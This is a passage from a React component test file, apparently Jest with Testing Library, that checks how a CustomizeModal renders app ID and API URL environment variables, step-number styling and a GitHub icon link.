      // Arrange
      const props = { ...defaultProps, appId: '' }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre')
        expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'')
      })
    })
    it('should handle empty api_base_url', async () => {
      // Arrange
      const props = { ...defaultProps, api_base_url: '' }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre')
        expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'')
      })
    })
    it('should handle special characters in appId', async () => {
      // Arrange
      const specialAppId = 'app-id-with-special-chars_123'
      const props = { ...defaultProps, appId: specialAppId }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre')
        expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`)
      })
    })
    it('should handle URL with special characters in api_base_url', async () => {
      // Arrange
      const specialApiUrl = 'https://api.example.com:8080/v1'
      const props = { ...defaultProps, api_base_url: specialApiUrl }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert
      await waitFor(() => {
        const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre')
        expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`)
      })
    })
  })
  // StepNum component tests - verify step number styling
  describe('StepNum component', () => {
    it('should render step numbers with correct styling class', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert - The StepNum component is the direct container of the text
      await waitFor(() => {
        const stepNumber1 = screen.getByText('1')
        expect(stepNumber1).toHaveClass('rounded-2xl')
      })
    })
  })
  // GithubIcon component tests - verify GitHub icon renders correctly
  describe('GithubIcon component', () => {
    it('should render GitHub icon SVG within GitHub link button', async () => {
      // Arrange
      const props = { ...defaultProps }
      // Act
      render(<CustomizeModal {...props} />)
      // Assert - Find GitHub link and verify it contains an SVG icon with expected class
      await waitFor(() => {
        const githubLink = screen.getByRole('link', { name: /step1Operation/i })
        const githubIcon = githubLink.querySelector('svg')
        expect(githubIcon).toBeInTheDocument()
        expect(githubIcon).toHaveClass('text-text-secondary')
      })
    })
  })
})